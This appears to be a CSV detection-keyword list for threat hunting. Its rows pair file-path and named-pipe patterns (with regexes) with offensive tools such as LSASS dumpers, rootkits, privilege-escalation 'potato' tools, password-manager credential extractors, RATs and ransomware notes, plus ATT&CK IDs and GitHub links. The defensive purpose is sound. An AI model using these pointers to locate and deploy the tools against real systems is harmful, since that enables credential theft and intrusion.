"*\\pipe\\$77control*",".{0,1000}\\\\pipe\\\\\$77control.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13670"
"*\\pipe\\DAV RPC SERVICE*",".{0,1000}\\\\pipe\\\\DAV\sRPC\sSERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","#namedpipe","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","13671"
"*\\pipe\\GodPotato*",".{0,1000}\\\\pipe\\\\GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#namedpipe","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","13672"
"*\\pipe\\moj_ML_ntsvcs*",".{0,1000}\\\\pipe\\\\moj_ML_ntsvcs.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#namedpipe","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","13673"
"*\\pipe\\MyNamePipe*",".{0,1000}\\\\pipe\\\\MyNamePipe.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#namedpipe","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","13674"
"*\\pipe\\petit\\pipe\\srvsvc*",".{0,1000}\\\\pipe\\\\petit\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#namedpipe","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13676"
"*\\pipe\\RustPotato*",".{0,1000}\\\\pipe\\\\RustPotato.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#content #namedpipe","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","13677"
"*\\pipe\\SigmaPotato*",".{0,1000}\\\\pipe\\\\SigmaPotato.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#namedpipe","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","13678"
"*\\PPLmedic\\ntstuff*",".{0,1000}\\\\PPLmedic\\\\ntstuff.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","13679"
"*\\Public\\panda.raw*",".{0,1000}\\\\Public\\\\panda\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","13680"
"*\\Public\\simpleMDWD.raw*",".{0,1000}\\\\Public\\\\simpleMDWD\.raw.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","13681"
"*\\Public\\sysMDWD.file*",".{0,1000}\\\\Public\\\\sysMDWD\.file.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","13682"
"*\\Release\\Injected.dll*",".{0,1000}\\\\Release\\\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13683"
"*\\saint.jar*",".{0,1000}\\\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","13685"
"*\\stub\\COFFLoader.bin*",".{0,1000}\\\\stub\\\\COFFLoader\.bin.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13686"
"*\\swodniW\\:C*",".{0,1000}\\\\swodniW\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13687"
"*\\system32\\msf.sys*",".{0,1000}\\\\system32\\\\msf\.sys.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","13688"
"*\\temp\\Injected.dll*",".{0,1000}\\\\temp\\\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13689"
"*\\Users\\Fantastic\\Desktop\\DEMO\\plugins\\scripts\\*",".{0,1000}\\\\Users\\\\Fantastic\\\\Desktop\\\\DEMO\\\\plugins\\\\scripts\\\\.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","13690"
"*\\Users\\Public\\quran.txt*",".{0,1000}\\\\Users\\\\Public\\\\quran\.txt.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","13691"
"*\\windows\\temp\\123.exe*",".{0,1000}\\\\windows\\\\temp\\\\123\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13692"
"*\\windows\\temp\\lsass.dmp*",".{0,1000}\\\\windows\\\\temp\\\\lsass\.dmp.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#content","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","13693"
"*\\windows\\temp\\lsass.dmp*",".{0,1000}\\\\windows\\\\temp\\\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13694"
"*\\Windows\\temp\\payload.exe*",".{0,1000}\\\\Windows\\\\temp\\\\payload\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","13695"
"*\\Windows\\Temp\\Results.txt*",".{0,1000}\\\\Windows\\\\Temp\\\\Results\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","13696"
"*\\windows\\temp\\sam.tmp*",".{0,1000}\\\\windows\\\\temp\\\\sam\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13697"
"*\\windows\\temp\\sys.tmp*",".{0,1000}\\\\windows\\\\temp\\\\sys\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13698"
"*\\Windows\\Temp\\Yanri_res.rc*",".{0,1000}\\\\Windows\\\\Temp\\\\Yanri_res\.rc.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","13699"
"*\__output 2^>^&1 >*",".{0,1000}\\__output\s2\^\>\^\&1\s\>.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13700"
"*\__output 2>&1 >*",".{0,1000}\\__output\s2\>\&1\s\>.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13701"
"*\_Locky_recover_instructions.txt*",".{0,1000}\\_Locky_recover_instructions\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13702"
"*\_READ_THIS_FILE_HBE8_.txt*",".{0,1000}\\_READ_THIS_FILE_HBE8_\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13703"
"*\+README-WARNING+.txt*",".{0,1000}\\\+README\-WARNING\+\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13704"
"*\0nly1 RAT *\Client.exe*",".{0,1000}\\0nly1\sRAT\s.{0,1000}\\Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13705"
"*\0nly1 RAT *\Server.exe *",".{0,1000}\\0nly1\sRAT\s.{0,1000}\\Server\.exe\s.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13706"
"*\1$a$$.exe*",".{0,1000}\\1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","13707"
"*\1.6-C2-main.zip*",".{0,1000}\\1\.6\-C2\-main\.zip.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","13708"
"*\1.Encrypt_shellcode*",".{0,1000}\\1\.Encrypt_shellcode.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","13711"
"*\1_6_C2.exe*",".{0,1000}\\1_6_C2\.exe.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","13713"
"*\10m_usernames.txt*",".{0,1000}\\10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","13714"
"*\127.0.0.1/pipe/coerced*",".{0,1000}\\127\.0\.0\.1\/pipe\/coerced.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","13715"
"*\1n73ction.php*",".{0,1000}\\1n73ction\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13717"
"*\1password\app\FindsecondPID1password.h*",".{0,1000}\\1password\\app\\FindsecondPID1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13718"
"*\1password\app\getCreds1passwordappEntries1.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13719"
"*\1password\app\getCreds1passwordappEntries2.h*",".{0,1000}\\1password\\app\\getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13720"
"*\1password\app\getCreds1passwordappMaster.h*",".{0,1000}\\1password\\app\\getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13721"
"*\1password\app\getProcUAC1password.h*",".{0,1000}\\1password\\app\\getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13722"
"*\1password\plugin\getCreds1passwordplugin.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13723"
"*\1password\plugin\getCreds1passwordplugin2.h*",".{0,1000}\\1password\\plugin\\getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","13724"
"*\2023*.shareaudit*",".{0,1000}\\2023.{0,1000}\.shareaudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","13728"
"*\2024*.shareaudit*",".{0,1000}\\2024.{0,1000}\.shareaudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","13729"
"*\2024-*_Recall_Extraction\*",".{0,1000}\\2024\-.{0,1000}_Recall_Extraction\\.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","13730"
"*\2025*.shareaudit*",".{0,1000}\\2025.{0,1000}\.shareaudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","13731"
"*\2025-*_Recall_Extraction\*",".{0,1000}\\2025\-.{0,1000}_Recall_Extraction\\.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","13732"
"*\2fac5c2a114c7896c33fb2b0a9f6443d\*",".{0,1000}\\2fac5c2a114c7896c33fb2b0a9f6443d\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","13733"
"*\523XaDi1i.README.txt*",".{0,1000}\\523XaDi1i\.README\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13750"
"*\888 RAT Private .exe*",".{0,1000}\\888\sRAT\sPrivate\s\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13760"
"*\8base_note.txt*",".{0,1000}\\8base_note\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","13761"
